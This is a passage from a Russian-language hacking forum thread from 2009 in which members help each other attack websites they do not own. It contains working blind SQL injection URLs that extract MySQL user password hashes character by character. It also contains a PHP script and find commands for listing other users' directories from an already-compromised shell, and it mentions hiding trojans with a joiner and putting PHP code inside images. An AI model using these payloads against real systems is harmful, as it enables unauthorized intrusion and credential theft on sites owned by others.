ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.09.2009, 16:39
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Провожу blind инъекцию первый раз,вначале узнал имя юзера таким запросом http://site/printerfriendlynews.php?newsid=1631+AND+ascii(lowe r(substring(user(),1,1)))>1
b и так до его имени,теперь как узнать его пароль?
|
|
|
23.09.2009, 16:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Если ветка >= 5
если есть доступ к mysql,
то
Код:
SELECT password FROM mysql.user WHERE user=0x0000
где 0000 - имя твоего пользователя в хексе. |
|
|
|
23.09.2009, 17:00
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Неполучается,есть таблицы user
|
|
|
|
23.09.2009, 17:10
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
2Fed123, вашим запросом вы узнали текущего юзера базы данных.
Пробуйте так:
Код:
www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+user+from+user+LIMIT+1),1,1)))>1
Код:
www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+password+from+mysql.user+WHERE+user="ВАШ ЮЗЕР"+LIMIT+1),1,1)))>1
Ну и так далее перебирайте.
Последний раз редактировалось Ins3t; 23.09.2009 в 19:38..
|
|
|
|
24.09.2009, 08:27
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Вопрос такой,есть шелл необходимо спарсить название папок
/юзер/папка/domain.com/
нужны название всех папок из путя,т.к у юзверей в разных папках домены лежат.
реверс по айпи не катит там,сеть айпи висит.
видел кто нить подобное?
руками не вариант
|
|
|
|
24.09.2009, 08:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
PHP код:
<pre>
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
@ignore_user_abort(1);
$l_folder = '/юзер/папка/domain.com'; // Полный абсолютный путь к папке
//Функция рекурсивного получения списка файлов и папок
function fold($rootDir, $allData=array()) {
$invisibleFileNames = array(".", "..");
$dirContent = scandir($rootDir);
foreach($dirContent as $key => $content) {
$path = $rootDir.'/'.$content;
if(!in_array($content, $invisibleFileNames)) {
if(is_file($path) && is_readable($path)) {
preg_match('|\/(.*)\/|',$path,$res);
$allData[0][] = $path;//Файлы
$allData[1][] = $res[0];//папки
}elseif(is_dir($path) && is_readable($path)) {
$allData = fold($path, $allData);
}
}
}
return $allData;
}
$b = fold($l_folder);
print_r($b);
?>
</pre>
|
|
|
|
24.09.2009, 11:55
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от Shadrin
Вопрос такой,есть шелл необходимо спарсить название папок
/юзер/папка/domain.com/
нужны название всех папок из путя,т.к у юзверей в разных папках домены лежат.
реверс по айпи не катит там,сеть айпи висит.
видел кто нить подобное?
руками не вариант
Если есть возможно выполнять команды, тогда:
Код:
find /юзер/папка/domain.com/ -type d
Если надо переходить по символическим ссылкам, тогда добавь -L
Пример:
Код:
$ find -L /tmp -type d
/tmp
/tmp/launch-2sW0uR
/tmp/launch-DM3FAL
/tmp/launch-DSlIgu
/tmp/launch-hrAmOc
/tmp/launchd-229.B1EiU1
/tmp/ssh-yqYA4n2bZI
__________________
включи голову
|
|
|
|
24.09.2009, 12:29
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 3
Провел на форуме:
3740
Репутация:
0
|
|
Как в изображение встроить код?
|
|
|
|
24.09.2009, 12:36
|
|
Познающий
Регистрация: 03.10.2007
Сообщений: 37
Провел на форуме:
259133
Репутация:
68
|
|
ATLANT_93 если ты хочешь присоединить троя или вирус, то джойнером. Но какое это отношение имеет к уязвимостям и данной теме?
|
|
|
|
24.09.2009, 12:56
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 3
Провел на форуме:
3740
Репутация:
0
|
|
Нет я хочу засунуть код на php в изображение
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
